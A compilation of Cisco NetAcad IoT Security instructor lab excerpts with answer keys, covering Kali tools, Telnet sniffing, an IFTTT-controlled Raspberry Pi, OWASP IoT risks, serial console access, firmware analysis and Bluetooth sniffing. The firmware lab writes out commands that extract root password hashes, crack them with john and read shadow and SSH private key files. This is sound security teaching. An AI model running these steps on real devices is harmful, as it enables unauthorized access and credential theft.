Answers will vary but can include port numbers and/or services such as TFTP using TCP port 69, etc.
2. What type of device could be used to recognize an Nmap scan and actively prevent the port scan and host
sweep?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
To actively prevent a scan from retrieving details about a host or network, an IPS device would be used. AN
IPS could recognize the number of connection attempts from the threat actor as excessive and
block/quarantine the traffic.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 11 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Exploring Kali Linux
Part 2: Investigating Nmap and Zenmap
Part 3: Using Wireshark to Open and Analyze a pcap File
Background / Scenario
Kali Linux is a Debian-based Linux distribution that contains tools for advanced penetration testing and
security auditing. Kali contains several hundred tools which are used for a wide variety of information
technology security tasks. In this lab, you will explore some of the tools available in Kali Linux.
Note: Only use Kali tools on networks on which you are authorized to do so.
Required Resources
PC with at least 1 GB of RAM and 15 GB of free disk space with IoTSec Kali VM
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools
b. Find each of the tools in the table below in the Kali Applications menu. Investigate each and fill in the
table below. You may need to run the tools to determine the type of interface that is used.
Note: Using any of these tools on actual networks could violate the ethical hacking policy for this course
and may break the law.
Nmap
Zenmap
SQLmap
Skipfish
Wireshark
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 4 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 4 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools
e. Go to the Analyze menu and select Follow > TCP Stream. A window appears that shows the data
exchanged between the client and server. The color coding identifies which host is the source of the data.
If you click any part of the conversation, the corresponding frame will be selected in the capture window.
What is the username and password used for authentication of the session?
____________________________________________________________________________________
____________________________________________________________________________________
fake:user
What operating system is running on the server?
____________________________________________________________________________________
OpenBSD
Which commands were sent from the client to be executed on the server??
____________________________________________________________________________________
____________________________________________________________________________________
ping www.yahoo.com, ls -a
How did the server respond?
____________________________________________________________________________________
____________________________________________________________________________________
The server responded with six ping return messages, ping summary statistics, and a listing of directories.
This packet capture illustrates an important security vulnerability that exists in the Telnet protocol. What is
this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
Telnet sends all data in clear text. The username and password can be read by anyone who could
execute a packet capture on this network segment. In addition, all data that is returned by the server is
also transmitted as clear text. A threat actor could use Wireshark to capture sensitive information in a
Telnet session if access to the network were possible.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 4 www.netacad.com
Lab – Create an IoT Sensor-Actuator System (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.
Connectivity requirements: As shown in the topology, the Raspberry Pi must be able to reach the Internet
and must also be reachable from a student computer via the network so that code can be completed in a
Jupyter Notebook.
Addressing
No specific addressing is required as long as the communications requirements are met.
Objectives
• Build a simple electronic circuit that is under control of the Raspberry Pi.
• Create a simple control app using IFTTT and dweet.io.
• Configure an IFTTT app as a widget in Android or iOS.
• Complete Python code that will control an end-to-end IoT system.
• Use a smartphone to trigger actions of Raspberry Pi through IFTTT.
• Describe possible security vulnerabilities of a such IoT system.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
Background / Scenario
IoT systems often consist not only of sensor and actuator electronics, but also of software applications that
control the systems through a cloud platform. In home automation systems, sensors and actuators in the
home connect to the local network over Wi-Fi and a cloud management platform through the Internet. The
cloud management platform collects data from the IoT system and enables control of it from either a browser
or specialized app that runs on a mobile device.
When evaluating system security, it is useful to break the system down into parts in order to identify different
areas of potential vulnerability.
In this lab, you will build a simple circuit that is controlled by the Raspberry Pi. Then, through the integration of
two web services, you will create a simple app that can control the circuit from a mobile device, either over a
cellular or Wi-Fi connection. To complete this lab, you will use your circuit building and Python skills from the
IoT Connecting Things course. Finally, you will analyze the system to identify potential vulnerabilities at the
device, communication, and application layers of the simplified IoT model.
Required Resources
• PC or laptop
• Raspberry Pi 3, Model B or B+, with PL-App
• Breadboard
• Two 330 Ohm resistors
• Two LEDs, one red and one green
• Jumper wires
• IFTTT account
• Smart phone with recent operating system (Requires iOS 9.0 or higher, or Android devices running 4.1 or
higher.)
• IFTTT app for Android or iOS
• Incoming Internet access to the Raspberry Pi over HTTPS (port 443)
• Network connectivity between host and Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
Use the schematic to make the connection from the circuit to the Raspberry Pi.
Schematic:
Pinouts:
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
# Import the GPIO modules to control the GPIO pins of the Raspberry Pi
import RPi.GPIO as GPIO
# Import the time module to control the timing of your application (e.g. add
delay, etc.)
import time
b. Setup the Raspberry Pi hardware. Add values for the pin numbers for the GreenLEDPin and RedLEDPin
variables. Get the values you need from the circuit connections.
In this code cell, and several others below, students are required to add values to the code. The areas
where values are required are indicated by comments that say "Add values." In addition, the areas of
code requiring completion are indicated with lines of equal signs: ===================.
# Code Cell 2.
#Setup hardware
# Set the desired pin numbering scheme:
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
#Create variables for the GPIO PINs the LEDs are connected to
# ============================================
# the PIN of the green LED
GreenLEDPin = 20 #Add values: add the pin number for the green LED
# the PIN of the red LED
RedLEDPin = 21 #Add values: add the pin number for the red LED
#=============================================
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
What did you change in the code to change the time that the LEDs were lit in each cycle?
____________________________________________________________________________________
In code cell 3, the values in one or both of the time.sleep() methods.
If the circuit were attached to different pins on the Pi, what in the code would need to be changed?
____________________________________________________________________________________
In Code Cell 2, the values assigned to the GreenLEDPin and RedLEDPin variables.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
d. In the Search services field, enter button and then click the Button widget tile that appears.
e. Click Connect. On the Choose trigger page, click the Button widget tile.
f. Click the blue +that text to select the action that will be triggered by the Button widget.
g. Type webhooks into the search services field and click the Webhooks tile to select this service as the
action that will be triggered.
h. We now need to enter in the URL of the dweet thing that will receive a message sent by the Button
Widget. First, we need to create a name for our thing. The name should be unique in order to make sure
that only messages posted by you will received by the thing. The name of the thing can contain no
spaces but can be hyphenated. Keep the name of your thing private. There is no account-based security
on dweet.io. We did not even need to register!
Click in the URL field of the Make a web request interface. Enter the following URL by substituting the
name your thing where indicated. Do not include the {} characters in the URL.
https://dweet.io/dweet/for/{my-thing-name}?text=mydweet
Students will benefit from exploring the dweet.io functionality and API. There is interactive documentation
that allows students to explore various dweet.io functionalities and API concepts. For the sake of brevity,
this material is not covered in this lab.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
i. Click Create action to create and Finish to save your app. Your completed applet should look like this:
That is it! This is all that you need to do to create the IFTTT app. The other fields on this screen can be left
unchanged.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
#===================
myThing = "your_thing_name" #Add value: add you dweet thing name
#===================
print(old_created)
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
Part 5: Use the IFTTT app on the smartphone to trigger an event on the
Raspberry Pi
Make sure the smart phone has Internet connectivity, either by Wi-Fi or cellular data. The connection can be
either Wi-Fi or cellular data. Using cellular data will prove that the circuit can be controlled from anywhere that
has cellular data coverage.
a. Run the code cells. It is not necessary to run Code Cell 3 unless you need to verify that the circuit still
works and can be controlled from the Pi.
b. When prompted, initialize an LED when the code cell is run by selecting the color that should be lit.
c. After running the last code cell, the Raspberry Pi will be continuously monitoring the dweet.io thing in
order to detect a new button push. On your smart phone, tap the IFTTT button widget. After a brief delay,
the LED that is illuminated will change. Try this several times and observe the circuit.
Congratulations! You have created your own end-to-end IoT system.
Reflection
1. This system is not terribly exciting but can serve as a model for much more interesting IoT systems. Choose
an IoT sector and imagine a device that could be actuated by a system like this (instead of, or in addition to,
the LEDs). What are the security implications if a hacker was able to take control of the system?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. This system could serve as a metaphor, most obviously, of a home automation application
that interacts with a home IoT device such as a light switch or other device that can be turned on or off. With a
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 12 www.netacad.com
Lab - Create an IoT Sensor-Actuator System
little additional imagination, the system could be seen as a wirelessly controlled medical device, power grid
switchgear, or even the flood gates on a dam.
2. Create a diagram of the system or use the one above. Label each element of the diagram with the layer of the
simplified IoT model that it belongs to.
3. What elements of this system make up its attack surface? List all the elements which are potentially
vulnerable to a cyberattack. What kinds of attacks are possible? Answer in the table below or create your own
table. Think of system in terms of the roles of elements. Rather than "Raspberry Pi" for example, think of
"Controller (Raspberry Pi)"
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 12 of 12 www.netacad.com
Lab – Investigating IoT Security Requirements (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will learn about IoT security requirements by investigating OWASP critical IoT security
vulnerabilities.
• Investigate OWASP.
• Investigate the OWASP IoT Top 10 Vulnerabilities.
• Investigate Vulnerabilities, Vulnerability Assessment, and Mitigation Measures.
Background / Scenario
In this lab, you will review a list of the top 10 IoT security vulnerabilities as documented by the Open Web
Application Security Project (OWASP). These vulnerabilities are generic weaknesses in IoT devices,
communications, or applications that can be exploited by threat actors. The vulnerabilities are directly related
to the IoT security requirements.
Instructor Note: The purpose of this lab is for students to begin thinking about how the critical security
requirements for IoT systems relate to specific vulnerabilities. The OWASP Internet of Things Project is a
valuable resource for learning about IoT security. Although some things discussed in it are beyond the scope
of this course, familiarity with the OWASP resources will help students continue in their learning about the IoT
security topic.
Required Resources
• PC with Internet access
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab - Investigating IoT Security Requirements
____________________________________________________________________________________
____________________________________________________________________________________
OWASP offers guidelines for medical and manufacturing (ICS/SCADA) IoT use cases.
Look at the IoT Event Logging Project tab. Give three examples of the security events that OWASP
recommends should be logged.
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. Students will not understand all of this, however, they should pick out a few things that
make sense to them, such as high rate of password attempts, traffic from unenrolled systems, device
case tampering, and device entered administrative mode. Encourage students to research and discuss
events that are new to them.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 4 www.netacad.com
Lab - Investigating IoT Security Requirements
Default passwords and usernames are required to be changed after initial setup. Password recovery
mechanisms do not verify to an attacker that a username is valid. For example, an attacker can enter a
random username at the interface and click "Forgot Password." The web frontend should require entry of
additional information, such as an email address as part of the recovery process. If the email address is
unknown to the system, then an error message is posted and the process will not continue. In addition,
passwords should be strong, account lock out should be implemented, and no passwords should be
transmitted in clear text.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 4 www.netacad.com
Vulnerability
Assessment
Mitigation
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 4 www.netacad.com
Lab – Investigate the FCC Database (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Use the Federal Communications Commission (FCC) database to view information about various IoT devices
that utilize radio frequencies for data transmission. The database has information that could benefit both the
user and a potential attacker.
Part 1: Search for Information by FCC ID
Part 2: Search for Information using the Advanced Search
Background / Scenario
IoT devices often use wireless technologies to communicate with various equipment including other IoT
devices. The FCC requires companies that develop devices that use any form of radio frequency for
transmission to register those devices and provide supporting information about the particular device. Tests
must be performed to make certain that the devices conform to the rules established by the FCC. The FCC
requires that device manufacturers visibly display their FCC ID on the device.
Required Resources
PC or mobile device with Internet access
b. The search fields include a grantee code and a product code. The grantee code is either a 3 character or
5 character code stamped on the device. The example used here has the ID printed on the label as FCC
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab – Investigate the FCC Database
ID: JNZYR0019. Because the ID provided does not specify how the number is separated attempt to put
the first 3 characters in the Grantee Code text box and the remaining characters in the Product Code
text box. Click the Search button. How many entries were displayed?
____________________________________________________________________________________
There is one entry displayed at the time this lab was written.
What is the Applicant Name that is displayed?
____________________________________________________________________________________
Logitech Far East Ltd
What other columns of information are available?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
View Form, Display Exhibits, Display Grant, Display Correspondence, Applicant Name, Address, City,
State, Country, Zip Code, FCC ID, Application Purpose, Final Action Date, Lower Frequency in MHz,
Upper Frequency in MHz.
c. Click the Summary link under the Display Exhibits column. Which Exhibit Types are marked as
Permanent Confidential?
____________________________________________________________________________________
Block Diagram, Operational Description, Schematics
d. Click the back button in your browser. Click the Detail link under the Display Exhibits column. A warning
message displays informing you that the FCC does not guarantee the documents to be virus-free. If you
have a current anti-virus application in place and have reason to trust the entity click OK to accept the
warning. What Exhibit Types are available?
____________________________________________________________________________________
____________________________________________________________________________________
Cover Letters, External Photos, ID/Location Info, Internal Photos, Test Report, Test Setup Photos, Users
Manual
e. Click the Test Report attachment. Scroll down to page 6 to display the General Information. What is the
Product that is displayed?
____________________________________________________________________________________
2.4GHz Cordless Keyboard
What information is displayed about the Antenna Type?
____________________________________________________________________________________
PCB printed antenna with 1.41dBi antenna gain
f. Scroll to the next page. How many channels are listed in the table? ______________________________
Channels 1-12
What is the frequency range? What technologies use this frequency range?
____________________________________________________________________________________
2405-2474Mhz, Bluetooth and WiFi both use this range. This range is part of the Industrial, Scientific and
Medical (ISM) radio bands.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 4 www.netacad.com
Lab – Investigate the FCC Database
g. Close the Test Report attachment. Click Internal Photos document. Scroll through the document, what
kind of photos are displayed?
____________________________________________________________________________________
A breakdown of the parts and components in the keyboard.
Is there a potential for an attack with this device? Please explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Given the keyboard uses Bluetooth it could be possible for an attacker to capture data transmitted. It
would also be possible for an attacker to modify the keyboard in some fashion to capture is being typed
without the users knowledge. This could possibly be achieved by implanting some kind of recording
device that makes use of the SPI_MOSI and SPI_MISO pins inside the keyboard. This keyboard could be
used on many types of IoT devices.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 4 www.netacad.com
Lab – Investigate the FCC Database
Reflection
1. How could the information available in the FCC database be valuable when attempting to secure IoT devices?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The primary areas to note would be the potential schematics and communication protocols.
2. How could the information available in the FCC database be valuable to an IoT attacker?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. Using the same information, we are attempting to secure areas that attackers are trying to
exploit.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 4 www.netacad.com
Lab - Compromise IoT Device Hardware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
Objectives
Perform threat modeling activities to evaluate IoT device hardware and firmware.
Part 1: Accessing the Raspberry Pi with Serial Interface
Part 2: Disabling Serial Login Access to Raspberry Pi
Background / Scenario
This lab will demonstrate how an IoT device may be compromised by physically connecting to the device
using communication protocols other than Ethernet. A Raspberry Pi could be used for controlling and
monitoring many types of equipment. It is important that security is in place at the forefront when configuring
and positioning these types of devices. The last part of the lab demonstrates how to secure against these
compromises.
The lab makes use of a variant of the RS-232 serial communication standard that has been used since the
1960’s to communicate between various types of equipment.
Please note the use of a special cable being used to connect the Raspberry Pi to the PC serial port.
Even though some PCs still have conventional RS-232 COM ports it is imperative that direct
connections from those pins are not made directly to the Raspberry Pi. The Raspberry Pi uses +3.3v
for the serial pins whereas the RS-232 specification indicates voltages up to +13v.
There are other possible methods for reducing the voltage given the header connections on the Raspberry Pi
and many other IoT type devices this provides the simplest way to accomplish serial connectivity.
Required Resources
Raspberry Pi 3 Model B or later (with PL-App)
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM and terminal emulation software, such as PuTTY
Network connectivity between PC and Raspberry Pi
adafruit - USB TO TTL SERIAL CABLE - DEBUG / CONSOLE CABLE FOR RASPBERRY PI or
compatible cable – adafruit PRODUCT ID: 954 (similar to the one pictured below)
Note: When purchasing a compatible cable look for those using either the Prolific or SiLabs Chipset. Make
certain to read the reviews when purchasing a compatible cable to verify compatibility with the Raspberry Pi.
It is important that the output voltage be +3.3v.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
Black 6 - Ground
White 8 - Transmit
Green 10 - Receive
Red Unused
e. After locating the necessary pins, power off the Raspberry Pi until instructed to power it up again.
(pl-app) root@myPi:/home/pi/notebooks# shutdown -h now
f. Unplug the Raspberry Pi from the power source. With the Raspberry Pi turned off, connect the USB to
Serial Cable to the pins listed in the above table on Raspberry Pi.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
c. Navigate to the Device Manager to determine the COM port assigned to the USB to Serial connection. In
this example, Prolific USB-to-Serial is using COM3.
d. The following settings will need to be defined for connecting to the Raspberry Pi using the console port.
Description Settings
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
For example, in PuTTY session screen, select the Serial radio button, input the COM port listed in the
Serial line box matches the COM port determined in Device Manager and the correct Baud rate is
specified.
Expand Connection and click Serial to verify all the options are configured according to the above table.
Click Open to start the terminal session to the Raspberry Pi. PuTTY is waiting for output from the
Raspberry Pi or input from the keyboard.
e. Power up the Raspberry Pi. Output from the Raspberry Pi should start scrolling across the screen as
shown below.
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.14.30+ (dc4@dc4-XPS13-9333) (gcc version 4.9.3
(crosstool-NG crosstool-ng-1.22.0-88-g8460611)) #1102 Mon Mar 26 16:20:05 BST 2018
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
IP: 203.0.113.11
myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 4.14.30+
What type of processor is being used?
____________________________________________________________________________________
CPU: ARMv7 Processor +
f. Log in using the credential for the user pi configured for your Raspberry Pi in a previous lab.
IP: 203.0.113.11
myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 3.18.11-v7+
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
import time
import serial
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 8 www.netacad.com
Lab - Compromise IoT Device Hardware
ser = serial.Serial(
port='/dev/serial0',
baudrate = 115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1
)
counter=0
Reflection
1. Knowing what you know so far, do you think it would be possible to connect two Raspberry Pi devices
together using the serial pins? If so, how?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
It would be very easy to do. Simply use a jumper wire connecting the Tx pin on Raspberry Pi #1 to the Rx pin
on Raspberry Pi #2 and the Rx pin on Raspberry Pi #1 to the Tx pin on Raspberry Pi #2. Because both
devices are using +3.3v, there would be no other conversion necessary. Both Raspberry Pi devices could
have their serial ports disabled for login and the terminal emulation software set and the same baud rate in
order to communicate. It may be necessary to download the ‘screen’ application using ‘apt-get install screen’
on the Raspberry Pi. It would also be possible to leave the serial login enabled on Raspberry Pi #1 and
connect to Raspberry Pi #2 using the ‘screen’ application and logging in.
2. What kind of information might you need to know in order to capture the data coming out of the serial port of
an IoT device?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
In order to capture data, it would be necessary to know the baud rate, stop bits, parity, and flow control
settings on the IoT device. The baud rate could be determined through trial and error using the common baud
rates. (ie. 2400,4800,9600,19200…..115200)
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 8 www.netacad.com
Lab – Compromise IoT Device Firmware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Performing Threat Modeling Activities to Evaluate IoT Device Firmware
Part 2: Reflection and Discussion of Threats to IoT Device Firmware
Background / Scenario
IoT devices are susceptible to attacks like many other Internet connected devices running an operating
system. In the past, hackers have taken over smart home devices including security cameras, refrigerators,
ovens, air conditioners, and even vehicles while they were driving. IoT devices with cameras can potentially
be used as spying devices within one’s home. Many popular IoT devices run Linux as their OS.
Vulnerabilities with device firmware include, but are not limited to: key handling vulnerabilities, hard coded
passwords, default username/passwords, clear text password transmission through WiFi, buffer overflow
attacks, distributed denial of service attacks, and firmware modification attacks.
This lab will require students to download a device firmware binary file and decompress/decode it to its file
system and kernel components. Students will be required to analyze the firmware and investigate how
vulnerabilities can be exploited.
In this particular lab, we will be exploring an IoT device’s firmware file by using a wide variety of
tools/commands on a Kali Linux virtual image.
Required Resources
Laptop or PC running Oracle Virtual Box with a virtual image of Kali Linux loaded
Internet connection
Note: If the Kali Linux machine has not been installed, please refer to a previous lab in this course.
b. Open up a terminal window.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab – Compromise IoT Device Firmware
Note: The Linux prompts in the examples of this lab have been shortened to just #, indicating that you
have root access.
# pwd
# cd /root/lab_support_files/emulated/mips32
# strings rootfs.ext2 | grep root:\\$ > /tmp/passwd
# more /tmp/passwd
b. Run john on the file /tmp/passwd to crack the password.
# john /tmp/passwd
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-
smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
<some output omitted>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
You could also use the show option to display the cracked passwords.
# john --show /tmp/passwd
What is the root password? ________________________________________________________ device
Step 3: Extract the IoT device firmware binary file into a new directory.
a. Change directories to the IoT device firmware file:
# cd /root/lab_support_files/firmware
b. List the content of the folder and obtain the name of the firmware file:
# ls -l
c. The following command will extract the file system from the firmware and will allow you to navigate and
explore anything that can be targeted as a potential vulnerability:
# binwalk -e iotdev_firmware.bin
What is the file system type? _____________________________________________________ squashfs
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 5 www.netacad.com
Lab – Compromise IoT Device Firmware
What is the name of the new directory within this subdirectory? What command did you use to determine
that?
____________________________________________________________________________________
____________________________________________________________________________________
squashfs-root, ls -l
Step 6: Use the QEMU open source machine emulator and virtualizer
QEMU will allow you to emulate binaries for other architectures different from what your Kali Linux image is
currently running on. QEMU supports the MIPS architecture.
All of the binaries in the squashfs-root directory that were decompiled/decompressed from the IoT device’s
firmware file were compiled for the MIPS architecture. They will not run on this Kali Virtual Image because it is
on a different architecture. In order to run these binaries, we will need to use QEMU.
Instructor Note: QEMU should already be installed on the Kali Linux virtual image.
a. The QEMU binary that we will be using needs to be copied to the squash-fs-root directory. Before we
copy it, we need to know where it is located:
# which qemu-mips-static
Where is this binary file located? _________________________________________________________
/usr/bin/qemu-mips-static
b. Copy this file to the current working directory which should be squash-fs-root:
# cp /usr/bin/qemu-mips-static .
c. Try running bin/busybox and other binaries without QEMU and notice that they will not be successful:
# bin/busybox
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 5 www.netacad.com
Lab – Compromise IoT Device Firmware
# bin/ping 127.0.0.1
These commands did not work since the QEMU emulator is required to run binaries originally compiled on
different architectures.
d. The following uses the chroot command. The chroot command changes the root directory to the current
directory as identified with the . (dot)
Enter the commands below to demonstrate that we can run MIPS binaries on the Kali Linux OS:
# chroot . ./qemu-mips-static bin/busybox date
# chroot . ./qemu-mips-static bin/ping –c 3 127.0.0.1
e. Start a new shell within the squashfs-root directory with the following command:
# chroot . ./qemu-mips-static bin/sh
How did the prompt change? ____________________________________________________________
It is now displaying the path as ‘/’ followed by the # for the root prompt
f. Verify that new shell is using the current path as the root directory.
# pwd
What is the current path? ______________________________________________________________ /
Look at other programs/binaries in the bin and sbin directories. Try running at least 3 other programs and
document their results. Type ‘exit’ when you have completed exploration to leave the shell.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
Step 7: Explore and look at other important files on this decompiled/extracted file
system
a. Verify you are currently within the squashfs-root directory:
# pwd
b. Use the following commands to explore and look for possible vulnerabilities:
# ls -l usr
# ls -l usr/bin
# ls -l bin/
# ls -l usr/sbin
# ls –l etc/
# cat etc/passwd
# cat etc/shadow
# cat etc/ssh/ssh_host_rsa_key
c. What other commands did you use to explore and look for possible vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 5 www.netacad.com
Lab – Compromise IoT Device Firmware
Answers will vary. Example: The mount command could allow access to other filesystems and import
malicious files or export files, such as /etc/shadow.
Reflection
1. What kinds of threats or vulnerabilities are IoT device firmware susceptible to?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices might be vulnerable to attacks such as Buffer Overflow attacks, DoS attacks, firmware
modification, distributed denial of service, and key handling vulnerabilities.
2. Describe one type of IoT device firmware attack and what measures could be used to help prevent this type
of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
A backdoor could be added to an existing script within the device firmware. If a hacker repackages the
firmware into a new downloadable binary file, an unsuspecting user could potentially install this infected
firmware on their IoT device. A hash could be used to verify that firmware binary files have not be modified.
3. Describe another type of IoT device firmware attack and what measures could be used to help prevent this
type of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices with default usernames could be logged into remotely. Fix includes: changing the default
username/passwords.
In addition: Passwords can be cracked or modified, and certificates can be modified.
4. What is the name of the program that hackers could use to modify firmware with a backdoor and repackage it
back into another firmware binary? Does this program exist on the Kali Linux operating system that you are
using? Hint: Use Google to find the answer.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
firmware-mod-kit
Yes.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 5 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
In this lab, students will become familiar with varying levels of security on different common devices that use
Bluetooth/BLE (Bluetooth Low Energy). Students will configure a Raspberry Pi to detect and display
information about the Bluetooth devices that are in its range. This is an awareness building lab that will help
students understand the nature of wireless hacking processes and requirements and take on a “hacker
mindset” to think like a “white hat” to help secure IoT Security devices.
Part 1: Configuring the Raspberry Pi as a Bluetooth Sniffer
Part 2: Using the CLI to Detect and Display Information about Bluetooth Device
Part 3: Using the CLI to Pair with a Sniffed Device
Background/Scenario
Bluetooth offers several benefits and advantages. Bluetooth also has risks.
Bluetooth technology and associated devices are susceptible to general wireless networking threats, such as
denial of service attacks and man in the middle (MITM) attacks. MITM attacks occur when the threat actors
position themselves between the source and destination and intercept the communications. Some Bluetooth
devices are designed to broadcast MAC, universal unique identifier (UUID) and service information at a
predefined interval. Due to continuous advertisement, hackers can easily track the device and decode the
broadcasting information using a sniffer. This lab requires that the target Bluetooth devices are locatable by
the Raspberry Pi. These could be phones, laptops, personal fitness devices, and others.
Note: The labs in this course assume that the student has all of the necessary hardware to perform them. If
you do not have the necessary hardware and wish to complete these labs, you may wish to purchase kits
which contain all of the hardware for the challenge labs and additional hardware, which can be used to
complete additional experiments beyond this course. Make sure to read the required resources for each
challenge lab to understand what hardware is required.
Instructor Note: Using a sniffer may be considered a breach of the security policy of the school. It is
recommended that permission be obtained before running this lab. If using a sniffer is an issue, the instructor
may wish to assign the lab as homework.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi
Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
• Bluetooth devices (PC, Smartphone, Smartband, Bluetooth LED Control…)
